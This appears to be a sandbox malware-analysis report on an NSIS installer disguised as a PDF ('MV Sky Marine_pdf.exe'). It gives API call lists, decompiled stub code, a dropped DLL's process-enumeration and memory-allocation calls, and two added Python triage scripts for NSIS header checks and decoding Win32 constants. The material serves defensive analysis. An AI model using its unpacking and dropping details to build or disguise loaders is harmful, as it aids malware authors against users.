                                                                                                  0x00402f34
                                                                                                  0x00402f40
                                                                                                  0x00000000
                                                                                                  0x00402f45
                                                                                                  0x00000000
                                                                                                  0x00402efd
                                                                                                  0x00000000
                                                                                                  0x00402eb1
                                                                                                  0x00402e3c
                                                                                                  0x00402e4e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402d33
                                                                                                  0x00402d33
                                                                                                  0x00402d38
                                                                                                  0x00402d3c
                                                                                                  0x00402d43
                                                                                                  0x00402d4a
                                                                                                  0x00402d4c
                                                                                                  0x00402d4c
                                                                                                  0x00402d54
                                                                                                  0x00402d5b
                                                                                                  0x00402ebd
                                                                                                  0x00402eff
                                                                                                  0x00000000
                                                                                                  0x00402eff
                                                                                                  0x00402d67
                                                                                                  0x00402deb
                                                                                                  0x00402dee
                                                                                                  0x00402df3
                                                                                                  0x00000000
                                                                                                  0x00402deb
                                                                                                  0x00402d74
                                                                                                  0x00402d79
                                                                                                  0x00402d81
                                                                                                  0x00402da7
                                                                                                  0x00402dad
                                                                                                  0x00402db6
                                                                                                  0x00402dbc
                                                                                                  0x00402dc1
                                                                                                  0x00402dc7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402dd1
                                                                                                  0x00402dd9
                                                                                                  0x00402ddc
                                                                                                  0x00402de1
                                                                                                  0x00402de3
                                                                                                  0x00402de3
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402dd1
                                                                                                  0x00402df4
                                                                                                  0x00402dfa
                                                                                                  0x00402e0a
                                                                                                  0x00402e0a
                                                                                                  0x00402e0d
                                                                                                  0x00402e13
                                                                                                  0x00402e15
                                                                                                  0x00000000
                                                                                                  0x00402d33

                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402CB9
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,00000400), ref: 00402CD5
                                                                                                    • Part of subcall function 004059FB: GetFileAttributesA.KERNELBASE(00000003,00402CE8,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 004059FF
                                                                                                    • Part of subcall function 004059FB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A21
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 00402D1E
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E65
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" , xrefs: 00402CA5
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402CB2, 00402E73
                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EB1
                                                                                                  • soft, xrefs: 00402D95
                                                                                                  • Inst, xrefs: 00402D8C
                                                                                                  • C:\Users\user\Desktop\MV Sky Marine_pdf.exe, xrefs: 00402CBF, 00402CCE, 00402CE2, 00402CFF
                                                                                                  • Null, xrefs: 00402D9E
                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EFF
                                                                                                  • C:\Users\user\Desktop, xrefs: 00402D00, 00402D05, 00402D0B
                                                                                                  • Error launching installer, xrefs: 00402CF5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV Sky Marine_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                  • API String ID: 2803837635-3842810095
                                                                                                  • Opcode ID: 7fd70c8277d5ef014cb9db5e6e74861e325fe440be814c78f72cfa94b25d12ec
                                                                                                  • Instruction ID: 4d26221675f5f87765302aeed84baf1f1304f02d467103b64e74c7d1d91a9346
                                                                                                  • Opcode Fuzzy Hash: 7fd70c8277d5ef014cb9db5e6e74861e325fe440be814c78f72cfa94b25d12ec
                                                                                                  • Instruction Fuzzy Hash: 1F71E471900215ABDB209F68DE89B9A77B8FB05324F10413BFA01B62D1D7BC9E419B9C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

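The API and string evidence above (GetModuleFileNameA, CreateFileA on its own image, GetFileSize, GlobalAlloc, the "Inst" / "soft" / "Null" compares and the "Installer integrity check has failed" message) is the NSIS installer stub locating its first header inside its own executable and CRC-checking the appended data. The script below is an added example, not code from the analyzed sample or from Joe Sandbox: it reproduces that check offline so an analyst can confirm a file is an NSIS package and whether its integrity trailer is intact. The structure layout and flag constants are taken from NSIS's fileform.h; the 512-byte scan step and the placement of the CRC in the last 4 bytes of the data block follow the stub's own loop, and the input it runs on is a constructed stand-in, not the MV Sky Marine_pdf.exe sample.

```python
"""Locate and integrity-check an NSIS installer's first header.

Added example, not code from the analyzed sample or from Joe Sandbox.
Layout/constants: NSIS fileform.h. Scan and CRC placement: NSIS stub main.c.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF
FH_NSINST = b"NullsoftInst"   # the stub compares it as three dwords: 'Inst', 'soft', 'Null'
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4           # installer built with CRCCheck off: the stub skips the check
FH_FLAGS_FORCE_CRC = 8        # installer refuses the /NCRC command-line switch
FH_FLAGS_MASK = 15

# struct firstheader { int flags; int siginfo; int nsinst[3];
#                      int length_of_header; int length_of_all_following_data; }
FIRSTHEADER = struct.Struct("<II12sII")
CHUNK = 512   # the stub reads its own image 512 bytes at a time and tests each chunk start


def find_firstheader(image):
    """Return a dict describing the first header, or None if the file is not NSIS.

    Mirrors the stub: only 512-byte-aligned candidates are tested, the flags
    must contain no unknown bits, and the data length must fit in the file.
    """
    for off in range(0, len(image) - FIRSTHEADER.size + 1, CHUNK):
        flags, sig, nsinst, hdr_len, data_len = FIRSTHEADER.unpack_from(image, off)
        if (sig == FH_SIG and nsinst == FH_NSINST
                and (flags & ~FH_FLAGS_MASK) == 0
                and 0 <= data_len <= len(image) - off):
            return {"offset": off, "flags": flags,
                    "length_of_header": hdr_len,
                    "length_of_all_following_data": data_len}
    return None


def verify_crc(image, fh):
    """Reproduce the check behind 'Installer integrity check has failed'.

    The zlib-compatible CRC32 covers every byte from the start of the file up
    to the last 4 bytes of the NSIS data block; those 4 bytes hold the expected
    value. Returns True/False, or None when the header disables the check.
    """
    if fh["flags"] & FH_FLAGS_NO_CRC:
        return None
    end = fh["offset"] + fh["length_of_all_following_data"]
    if end < 4 or end > len(image):
        return False
    stored = struct.unpack_from("<I", image, end - 4)[0]
    return (zlib.crc32(image[:end - 4]) & 0xFFFFFFFF) == stored


def build_sample(stub_size=1024, payload=b"\x00" * 300, flags=0):
    """Constructed test input (not the analyzed file): a dummy MZ stub, the first
    header, a payload standing in for the compressed datablock, then the CRC."""
    stub = b"MZ" + b"\x00" * (stub_size - 2)
    data_len = FIRSTHEADER.size + len(payload) + 4   # header + datablock + CRC trailer
    fh = FIRSTHEADER.pack(flags, FH_SIG, FH_NSINST, 0, data_len)  # length_of_header unused here
    body = stub + fh + payload
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def triage(image):
    """One-call summary: (is_nsis, header_offset_or_None, crc_result)."""
    fh = find_firstheader(image)
    if fh is None:
        return (False, None, None)
    return (True, fh["offset"], verify_crc(image, fh))


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(triage(data))
```

Run it against a suspected installer to get `(True, offset, crc_ok)`; a `False` CRC result on an otherwise intact NSIS layout is what makes the stub print the integrity error seen in the string table, and a `None` means the builder disabled the check, so the payload could have been modified after build without the stub noticing.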
                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
                                                                                                  				void* _t33;
                                                                                                  				void* _t41;
                                                                                                  				void* _t43;
                                                                                                  				FILETIME* _t49;
                                                                                                  				FILETIME* _t62;
                                                                                                  				void* _t64;
                                                                                                  				signed int _t70;
                                                                                                  				FILETIME* _t71;
                                                                                                  				FILETIME* _t75;
                                                                                                  				signed int _t77;
                                                                                                  				void* _t80;
                                                                                                  				CHAR* _t82;
                                                                                                  				void* _t85;
                                                                                                  
                                                                                                  				_t75 = __ebx;
                                                                                                  				_t82 = E00402A29(0x31);
                                                                                                  				 *(_t85 - 0xc) = _t82;
                                                                                                  				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                                  				_t33 = E00405884(_t82);
                                                                                                  				_push(_t82);
                                                                                                  				if(_t33 == 0) {
                                                                                                  					lstrcatA(E00405817(E00405D24(0x409c30, 0x7a8800)), ??);
                                                                                                  				} else {
                                                                                                  					_push(0x409c30);
                                                                                                  					E00405D24();
                                                                                                  				}
                                                                                                  				E00405F86(0x409c30);
                                                                                                  				while(1) {
                                                                                                  					__eflags =  *(_t85 + 8) - 3;
                                                                                                  					if( *(_t85 + 8) >= 3) {
                                                                                                  						_t64 = E0040601F(0x409c30);
                                                                                                  						_t77 = 0;
                                                                                                  						__eflags = _t64 - _t75;
                                                                                                  						if(_t64 != _t75) {
                                                                                                  							_t71 = _t64 + 0x14;
                                                                                                  							__eflags = _t71;
                                                                                                  							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                                  						}
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                  						__eflags = _t70;
                                                                                                  						 *(_t85 + 8) = _t70;
                                                                                                  					}
                                                                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                                                                  					if( *(_t85 + 8) == _t75) {
                                                                                                  						E004059DC(0x409c30);
                                                                                                  					}
                                                                                                  					__eflags =  *(_t85 + 8) - 1;
                                                                                                  					_t41 = E004059FB(0x409c30, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                  					__eflags = _t41 - 0xffffffff;
                                                                                                  					 *(_t85 - 8) = _t41;
                                                                                                  					if(_t41 != 0xffffffff) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                                                                  					if( *(_t85 + 8) != _t75) {
                                                                                                  						E00405010(0xffffffe2,  *(_t85 - 0xc));
                                                                                                  						__eflags =  *(_t85 + 8) - 2;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                  						}
                                                                                                  						L31:
                                                                                                  						 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t85 - 4));
                                                                                                  						__eflags =  *0x7a2828;
                                                                                                  						goto L32;
                                                                                                  					} else {
                                                                                                  						E00405D24(0x40a430, 0x7a3000);
                                                                                                  						E00405D24(0x7a3000, 0x409c30);
                                                                                                  						E00405D46(_t75, 0x40a430, 0x409c30, "C:\Users\alfons\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                                  						E00405D24(0x7a3000, 0x40a430);
                                                                                                  						_t62 = E004055E5("C:\Users\alfons\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                                  						__eflags = _t62;
                                                                                                  						if(_t62 == 0) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							__eflags = _t62 == 1;
                                                                                                  							if(_t62 == 1) {
                                                                                                  								 *0x7a2828 =  &( *0x7a2828->dwLowDateTime);
                                                                                                  								L32:
                                                                                                  								_t49 = 0;
                                                                                                  								__eflags = 0;
                                                                                                  							} else {
                                                                                                  								_push(0x409c30);
                                                                                                  								_push(0xfffffffa);
                                                                                                  								E00405010();
                                                                                                  								L29:
                                                                                                  								_t49 = 0x7fffffff;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L33:
                                                                                                  					return _t49;
                                                                                                  				}
                                                                                                  				E00405010(0xffffffea,  *(_t85 - 0xc));
                                                                                                  				 *0x7a2854 =  *0x7a2854 + 1;
                                                                                                  				_t43 = E00402F4E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                                                                                  				 *0x7a2854 =  *0x7a2854 - 1;
                                                                                                  				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                                  				_t80 = _t43;
                                                                                                  				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                                  					L22:
                                                                                                  					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c);
                                                                                                  				} else {
                                                                                                  					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                                  					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                                  						goto L22;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                                                                                  				__eflags = _t80 - _t75;
                                                                                                  				if(_t80 >= _t75) {
                                                                                                  					goto L31;
                                                                                                  				} else {
                                                                                                  					__eflags = _t80 - 0xfffffffe;
                                                                                                  					if(_t80 != 0xfffffffe) {
                                                                                                  						E00405D46(_t75, _t80, 0x409c30, 0x409c30, 0xffffffee);
                                                                                                  					} else {
                                                                                                  						E00405D46(_t75, _t80, 0x409c30, 0x409c30, 0xffffffe9);
                                                                                                  						lstrcatA(0x409c30,  *(_t85 - 0xc));
                                                                                                  					}
                                                                                                  					_push(0x200010);
                                                                                                  					_push(0x409c30);
                                                                                                  					E004055E5();
                                                                                                  					goto L29;
                                                                                                  				}
                                                                                                  				goto L33;
                                                                                                  			}

APIs
• lstrcatA.KERNEL32(00000000,00000000,HfkcdoekxlzOjbt,007A8800,00000000,00000000,00000031), ref: 00401790
• CompareFileTime.KERNEL32(-00000014,?,HfkcdoekxlzOjbt,HfkcdoekxlzOjbt,00000000,00000000,HfkcdoekxlzOjbt,007A8800,00000000,00000000,00000031), ref: 004017BA
  • Part of subcall function 00405D24: lstrcpynA.KERNEL32(?,?,00000400,0040331D,007A1FA0,NSIS Error), ref: 00405D31
  • Part of subcall function 00405010: lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
  • Part of subcall function 00405010: lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
  • Part of subcall function 00405010: lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
  • Part of subcall function 00405010: SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
  • Part of subcall function 00405010: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
  • Part of subcall function 00405010: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
  • Part of subcall function 00405010: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp$C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll$HfkcdoekxlzOjbt
• API String ID: 1941528284-1124299726
• Opcode ID: 3ed75d5ec2aaaa4dda51dd868a496994b7c7c47cfda75710b456c16e46bfc254
• Instruction ID: bcf89e71c0b84c1643d0e5dd4294d147bdc57561e776f7a63a755c298ef41478
• Opcode Fuzzy Hash: 3ed75d5ec2aaaa4dda51dd868a496994b7c7c47cfda75710b456c16e46bfc254
• Instruction Fuzzy Hash: A841B672910515BBCF107FA5CC49DAF76A9DF46368B20823BF421F50E1D63C8A419A6D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004054D2(CHAR* _a4) {
	struct _SECURITY_ATTRIBUTES _v16;
	struct _SECURITY_DESCRIPTOR _v36;
	int _t22;
	long _t23;

	_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
	_v36.Owner = 0x40735c;
	_v36.Group = 0x40735c;
	_v36.Sacl = _v36.Sacl & 0x00000000;
	_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
	_v16.lpSecurityDescriptor =  &_v36;
	_v36.Revision = 1;
	_v36.Control = 4;
	_v36.Dacl = 0x40734c;
	_v16.nLength = 0xc;
	_t22 = CreateDirectoryA(_a4,  &_v16); // executed
	if(_t22 != 0) {
		L1:
		return 0;
	}
	_t23 = GetLastError();
	if(_t23 == 0xb7) {
		if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
			goto L1;
		}
		return GetLastError();
	}
	return _t23;
}

APIs
• CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405515
• GetLastError.KERNEL32 ref: 00405529
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040553E
• GetLastError.KERNEL32 ref: 00405548
Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\Desktop$Ls@$\s@
• API String ID: 3449924974-776639217
• Opcode ID: 31ad9693580a8955374231099f971d3d62770966da1912963915dd7ffeca80d6
• Instruction ID: 8051479f1b7dfbdff81470336266ace25075fbacda9c2120679e06572a60611e
• Opcode Fuzzy Hash: 31ad9693580a8955374231099f971d3d62770966da1912963915dd7ffeca80d6
• Instruction Fuzzy Hash: B7010871D04219EAEF019BA0DD047EFBFB9EF04358F008136D905B6190D378A604CFAA
Uniqueness
Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 10004347: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,034CF0BF,873D1860,034CF0BF,5C7BF6E9,034CF0BF,EA31D3B6), ref: 1000438C
                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10004650
                                                                                                    • Part of subcall function 10004347: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100043B0
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 10004683
                                                                                                    • Part of subcall function 10004347: Process32NextW.KERNEL32(000000FF,0000022C,?), ref: 100043DB
                                                                                                  • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 100046A3
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 10004722
                                                                                                  • ExitProcess.KERNEL32(00000000,00000000,00000000,eefabbdd2d91492f84a447c9784d4f08,00000020,00000000,00000000,00000000), ref: 100047B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: AllocCreateFileProcess32Virtual$ExitFirstNextProcessReadSnapshotToolhelp32
                                                                                                  • String ID: eefabbdd2d91492f84a447c9784d4f08
                                                                                                  • API String ID: 3683539093-2742424023
                                                                                                  • Opcode ID: fda209e7b4fa27b05ffb3c82032ba5aa4b075fea44580e8131726da5a0d44328
                                                                                                  • Instruction ID: 3a7903ee8559d346e032095aa3da00bd5eaae24efd5f37b303c251154b6b1a8a
                                                                                                  • Opcode Fuzzy Hash: fda209e7b4fa27b05ffb3c82032ba5aa4b075fea44580e8131726da5a0d44328
                                                                                                  • Instruction Fuzzy Hash: 24C17970D04388EEEF11CBE4DC46BEDBBB5EF05744F114099E604BA292DBB55A44CB29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
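
The argument columns in the API lists above are raw hex stack values. As an added example, not part of this report or of Joe Sandbox, the following Python decodes the documented Win32 constants for the calls that appear on this page: CreateFileW access mask, share mode, creation disposition and attributes; VirtualAlloc/VirtualFree allocation type and page protection; LoadLibraryExA flags; CreateToolhelp32Snapshot flags; and the dwSize value handed to Process32FirstW, which is sizeof(PROCESSENTRY32W) in a 32-bit process. The line format and the argument positions are taken from how the values line up on this page; in particular, the first value listed for CreateFileW is assumed not to be one of its parameters, so dwDesiredAccess is read from position 2. That alignment is an assumption, not something the report states. The sample lines are copied from the listings on this page.

```python
"""Decode Win32 constants in the API-call lines of a Joe Sandbox function listing.

Added example. The argument positions below follow how the values line up on
this page (an assumption, see the lead-in), not a documented report format.
"""
import re

# Documented Win32 constants (winnt.h / winbase.h / tlhelp32.h values).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRIBUTES = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
LOADLIB = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
           0x8: "LOAD_WITH_ALTERED_SEARCH_PATH"}
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
          0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}


def flag_names(value, table):
    """Render a bit mask as NAME|NAME, keeping any undecoded bits as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append("0x%x" % rest)
    return "|".join(names) or "0"


def enum_name(value, table):
    return table.get(value, "0x%x" % value)


# API name -> [(argument position in the listing, decoder)].
# Positions follow this page's listings; CreateFileW's first listed value is
# assumed to precede its real parameters (see the lead-in).
DECODERS = {
    "CreateFileW": [(2, lambda v: flag_names(v, GENERIC)),
                    (3, lambda v: flag_names(v, SHARE)),
                    (5, lambda v: enum_name(v, DISPOSITION)),
                    (6, lambda v: flag_names(v, ATTRIBUTES))],
    "VirtualAlloc": [(2, lambda v: flag_names(v, MEM)), (3, lambda v: enum_name(v, PAGE))],
    "VirtualFree": [(2, lambda v: flag_names(v, MEM))],
    "LoadLibraryExA": [(2, lambda v: flag_names(v, LOADLIB))],
    "CreateToolhelp32Snapshot": [(0, lambda v: flag_names(v, TH32CS))],
    # 0x22C == sizeof(PROCESSENTRY32W) in a 32-bit process: the dwSize field set by the caller.
    "Process32FirstW": [(1, lambda v: "sizeof(PROCESSENTRY32W)" if v == 0x22C else "0x%x" % v)],
}

# "<api>.<module>(<hex args>), ref: <addr>", optionally prefixed by "Part of subcall function X: ".
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")


def decode_api_line(line):
    """Parse one listing line; returns None for lines that are not API calls."""
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = m["args"]
    args = [a.strip() for a in raw.split(",")] if raw else []
    decoded = {}
    for pos, fn in DECODERS.get(m["api"], []):
        if pos < len(args) and args[pos] != "?":   # "?" marks a value the sandbox did not capture
            decoded[pos] = fn(int(args[pos], 16))
    return {"api": m["api"], "module": m["mod"], "subcall": m["sub"],
            "ref": int(m["ref"], 16), "args": args, "decoded": decoded}


def decode_listing(lines):
    return [d for d in (decode_api_line(line) for line in lines) if d]


# Sample lines copied from the listings on this page.
SAMPLE_LINES = [
    "• Part of subcall function 10004347: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,034CF0BF,873D1860,034CF0BF,5C7BF6E9,034CF0BF,EA31D3B6), ref: 1000438C",
    "• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10004650",
    "• Part of subcall function 10004347: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100043B0",
    "• VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 10004683",
    "• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 10003B00",
    "• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AA",
    "• GetSystemDirectoryA.KERNEL32 ref: 0040605D",
    "Strings",
]

if __name__ == "__main__":
    for d in decode_listing(SAMPLE_LINES):
        print("%08x %-26s %s" % (d["ref"], d["api"], d["decoded"]))
```

Run as a script it prints one decoded line per call; the CreateFileW call resolves to GENERIC_READ with full sharing and OPEN_EXISTING, VirtualAlloc to MEM_COMMIT|MEM_RESERVE with PAGE_READWRITE, and LoadLibraryExA to LOAD_WITH_ALTERED_SEARCH_PATH. Lines without an argument list (GetSystemDirectoryA) are kept with an empty argument vector so the call sequence stays complete.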

                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 10003933
                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 10003B00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp
